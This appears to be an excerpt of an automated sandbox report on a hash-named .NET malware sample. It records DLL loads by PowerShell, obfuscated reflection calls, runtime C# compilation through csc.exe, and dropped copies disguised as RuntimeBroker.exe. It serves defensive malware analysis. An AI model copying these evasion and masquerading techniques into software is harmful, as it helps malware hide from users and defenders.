                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic file information: File size 2011136 > 1048576
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1ea800
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: ;C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.pdb source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.pdb source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.cs.Net Code: Type.GetTypeFromHandle(DnmyeC7ekibjx1HNibt.kumoMEJoB3D(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(DnmyeC7ekibjx1HNibt.kumoMEJoB3D(16777245)),Type.GetTypeFromHandle(DnmyeC7ekibjx1HNibt.kumoMEJoB3D(16777259))})
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeCode function: 0_2_00007FFAACC84AEF push 3506F8C1h; retf 0_2_00007FFAACC84AF6
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeCode function: 0_2_00007FFAACC827F3 push ebp; retf 0009h0_2_00007FFAACC827F4
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe0.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: RuntimeBroker.exe.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe1.0.drStatic PE information: section name: .text entropy: 7.572469597468066
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DHqWX1MX9gqbLDXcrUd.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'gtX4RMKV50v', 'e2i4y4tjFj5', 'vjhuVB4VeRh0TxPrhnBI', 'Gb2jdr4VhdledSAi0ycG', 'cEPQF44VIZAUBBXjqQod', 'uh9ydR4VsiX3yvUYBUN5'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, mfOTrCRsoQEfFnKJ8sa.csHigh entropy of concatenated method names: 'O56RdcLu5F', 'pqJI2a41EkxOwaVCl0vi', 'tWx4EK41x5RSIRNpMRA6', 'IiC1K041P5p7kEcYXdew', 'yZARQRtx04', 'LXB6Ip41WCh7TrdhSRKQ', 'dA2Qfs416hm6wrYLTKDb', 'FYdUhJ41mFNS5lUSOluA', 'Ce2cNV41vEGP3hQn93O8', 'lkxIFo4199jXdBTw5s00'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, r9vAMe2DbgIJXJRNpJm.csHigh entropy of concatenated method names: 'Ffb2IrnKuN', 'D4W2ii0KZD', 'wuP2m2WAKX', 'D0x2vcWmxP', 'Vw72Wl2SwI', 'Q4p265Ji6v', 'Id7299gYmO', 'lsy2AmXW1V', 'Dispose', 'WphmKX4kUuh9pH2yNWP7'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, OuXCHBAVvCwqNvN2gmW.csHigh entropy of concatenated method names: 'method_0', 'nNXAgNd2FA', 'vJmA1Eng5o', 'kGkAT1NQ48', 't3QANOniWc', 'MOwArMrMbU', 'qnkABDwV2s', 'h41PXj4fDk2Ld2KQ8KNO', 'hw8eLm4fePxaa7Grug8A', 'CngKTe4fhE5xY17xBU0Y'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Umkxrk6Cqo6gTqwjaYC.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'AgC6fy0J4b', 'x9J6LG1SN5', 'Dispose', 'D31', 'wNK'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DYu1jCmD6bDuaJZWsWi.csHigh entropy of concatenated method names: 'lCdW4oXEVY', 'JLqFMX4CsjwbUVa54aLQ', 'myfaBl4ChluXBrlwoUru', 'wR7fqB4CIVVsTDTP23Gl', 'uaSelq4CllaZSc935W6e', 'sc0mha4yMe', 'Hn8mII982u', 'th3msgI3Uw', 'ATnml32MQJ', 'jfomQvpGlo'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ycncuq2VJwO2UZtQwd5.csHigh entropy of concatenated method names: 'cj42gSJsJI', 'T2d21SggsP', 'kfH2T3hi9P', 'J6L2Ner36x', 'Dispose', 'IyLPCh4kjXVWFLQZIS0L', 'bvC7Li4kYwMqvnYf6UwX', 'fOSZNE4kZH3enOKwVL9k', 'IXKKDW4kDra8piIZyZbk', 'X338W94kexC0KMoYF527'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, nU0GKq7Q1U4twX3xKTZ.csHigh entropy of concatenated method names: 'kUK7PXv55J', 'PjQ78HYNHJ', 'ERd7VpWxdD', 'T2Y73PhwOo', 'JfD7gZUDgA', 'l4b71Ye4g5', 'Od07TLiVka', 'zsQ7N81LhX', 'Cxj7rgn17H', 'AG57Bv6q5l'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, zgtbUrcMZ0RTbOTMut6.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'NoZca17hpv', 'vmethod_0', 'x6ScRvXITM', 'jxh4RcwhBUA', 'YksxPI4wrdIrv6F1CCyQ', 'VUrIuq4wTIJE0j7MOgTd', 'BDaxsc4wNbuoLaJd18K6'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DYiAxPBHvVag2Z9MhIn.csHigh entropy of concatenated method names: 'H1b4R6Z9xj1', 'tEwBLFU76B', 'nKnBOMpHt2', 'G0FBqB3MJV', 'CACp4J4tQa80H8CiBDdr', 'ehmqID4tiJyMJZj4ooOH', 'fEiOOf4tdTChjmvAH8lr', 'jb4DlD4tcIwZQV36Rx3x', 'aO6gau4tmsWcwfGKhveF', 'wJxoZA4tvrN2A1EOCw2g'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y7WTRfUAt93TwyDWSgo.csHigh entropy of concatenated method names: 'fPPUpBOouw', 'mR7UCZA8To', 'KFoUHZXA8H', 'RXCkcS4PBu38Aifmpo45', 'Gx2Cor4PGChcESb6jljm', 'KJKYaI4PN0jqC9ic3iaw', 'OSrgeG4PrCegtrlR7ylc', 'yNGUxo3Fp0', 'sK9UP7dgrQ', 'x0rU8jG8MH'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ICyeT0dq7FpH3EYhMDb.csHigh entropy of concatenated method names: 'MWS4Rs99kYJ', 'U0HdKaaQjZ', 'X514RlF0F9h', 'mCn1Uy4wQsPF5t5lLaPf', 'eDZgwm4wi1fDRis7S0T8', 'zhKsVX4wsC5607aay1jf', 'bO8upB4wloAtcbIOTvWy', 'W0hRHA4wd9NVTAvJwX97', 'kfN6K94wcZgLY3P52uvb', 'p8X02E4wmDcUhlI7j2jr'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pQ5PKEoMV2tcIbg4VEr.csHigh entropy of concatenated method names: 'TkkoajyUQl', 'RnroRTHXqB', 'L9foXqaDnm', 'CsDoYLHLC7', 's9Cn2w4xRiLIbycjVsK6', 'ylD7694x0e0UAZmhFGjr', 'GyndHb4xa98CmLOl3mHm', 'U86Mw94xXT0aBbHkYkhr', 'WiQSBh4xYUkQDxUPOgqs', 'znpVsp4xZgYtvApaEMdI'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pg8KmFaiYN5Es4mA9ES.csHigh entropy of concatenated method names: 'r1waxNGKW2', 'oHSrdf4gNe0DEvUcRAtM', 'uET6xH4gruHqMVbqvk1x', 'cDv8nK4gBJ8pCIkRlUvl', 'xZkU914gGmKJVgqTRRJc', 'XZP2bo4g5DkdA37Qw5RX', 'fXGacji7h2', 'hm5amcJqxX', 'cTLavgmOB6', 'Y8faWda2X3'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, cR7E6wixWfruYQNdOY7.csHigh entropy of concatenated method names: 'sh8iNu8RaX', 'Mh91584GuBeGjTCT45So', 'Q1WVOg4GnZvyAEQS2nK1', 'TWnexM4GtDFuBIFAKHvv', 'OKDVs84G2mdFevoWxY4f', 'Q7gi83FycV', 'N7QiVD85Fq', 'myQi3pY5CJ', 't0i9te4Gqs0v7Ec34q0o', 'qGyoAG4GLWJy2ryiusWj'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, TRj9fr4SEcQ7yWtOFXZ.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'RYm4R4igkpi', 'e2i4y4tjFj5', 'oqQfAj4Et9skVdDlRGEq', 'uRw0lr4Eu4QVrBP2LFhY', 'wh6L7E4E2g6ElM9bkplW', 'Si935f4EJ3mNdpw52UKv'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, uRC4MOgTgtZEa4KnvfP.csHigh entropy of concatenated method names: 'Close', 'qL6', 'R1mgrRI2Tc', 'hvjgBdYogC', 'OMmgGwItFs', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, YThpP9cIA1DqXqBfCjN.csHigh entropy of concatenated method names: 'Gvil9I4pa7O5vO64Dd4b', 'KJjHlJ4pRVx76HjI6AcG', 'o6XY2n4pXsg9OYEL6WEk', 'GHbRys4pMeSodfBqibXT', 'GZ5Dkt4p0dFhSPv4jL5d', 'method_0', 'method_1', 'JDfcljAueO', 'Gn8cQqrRN2', 'OmLci0C4TU'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y1AZWLy32GcvXc2sKqd.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'z7R4Ryu2367', 'e2i4y4tjFj5', 'j6Jv1T48PwaNvVSchaOY', 'clKDOi488VibBTi9mhkF', 'ga67aM48Vob06YguLn3y', 'EeUv9v483Y7qnleeykAI', 'FB4J0Y48gCBbXOqcyXQi'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, OeJjJC4twrVfAxiG4A6.csHigh entropy of concatenated method names: 'P9X', 'a9T42tlJ2t', 'M4O4RbAcqQI', 'imethod_0', 'JOl4JVKZwb', 'TBT5fI4EOgrwEp7Mi9Yo', 'tBuvpb4EfCanhHW47fwQ', 'QTtOxW4ELURB1V843dXh', 'b3ef514EqpkqClylm1SD', 'I3ehVb4EFj1OgbBpIBvQ'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, LilhZhVkTtTcbDx5Gxb.csHigh entropy of concatenated method names: 'WP3VS05VQe', 'zrCVzJCPLL', 'pV13bI4DHt', 'FTZ34pTlHl', 'Qw13oHjOUB', 'spW3U1O0sc', 'Rpx', 'method_4', 'f6W', 'uL1'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, h23FhTMIa0Kf0qwyLTy.csHigh entropy of concatenated method names: 'JJuMEClHNL', 'cvAMxWd20J', 'cV7MPRM6yx', 'r71GpM4VT588FqQvscKB', 'llp2qd4VNfqDy5gUAm1t', 'YPXGik4VgSMfs4fhsJrd', 'VAW0L64V1WLwEI45aYXa', 'Et0MWEqmow', 'hwPM6q1xRU', 'Fs6Ep24V8K19BFlTjtcT'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, a2QWd4deZSv6jHvoqUS.csHigh entropy of concatenated method names: 'oKEddA9CYW', 'kQ5Fhd45fHQVpNIpFaZ3', 'tVjCxc45LX53nTtEyXFh', 'mIPUhJ45CCINMM2tnose', 'oxmRyQ45HkHKQD1XAVa6', 'J9g1nL45OKB7rphvO8ty', 'toadIAM6ly', 'OkgX7C45r1eDaqLMQUpq', 'xyxxRo45T1h3jJHvhTFr', 'JmrKCF45NRCNSBi2jKth'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, UvZaqqaXLeftAx16lpl.csHigh entropy of concatenated method names: 'x0LaZU9UiH', 'K9qaj051Hp', 'ToLcXk4gDGgtb5tO4dTS', 'R5b5up4gZfdsN8Dao5Sj', 'SCaem24gjYZrXtTINUMq', 'vb2Bjt4geNPCWgVyIq3a', 'EZ7WUu4ghtNIeGhJ5VUQ', 'v1U7fg4gIXns7gmbReS4', 'Am96UT4gsmFjtST0aoHD', 'SPQVML4gl8XM8vIis5uA'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, W5lolZGJ9rraSRUy8Kq.csHigh entropy of concatenated method names: 'ppoG7R5Xqf', 'FluGSPbyQu', 'OLUGzNxC82', 'CLA5bkulOZ', 'pII54tu3hD', 'zsf5o09XEd', 'fVA5U5HxCk', 'E8k5yW1rQ1', 'zWa5M4Qv9c', 'WYI50WQueW'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, xYdACC7G1nI42GSlcNV.csHigh entropy of concatenated method names: 'nmA403JFDko', 'VOl40gr6PMi', 'h4c401cOrsO', 'xQw40TLiP2w', 'jnp40Na9bWo', 'Hxi40rXMUGE', 'xWA40BFAkTg', 'ukkSMFpR7V', 'OAw40GlXxXW', 'r5N405OJjPT'
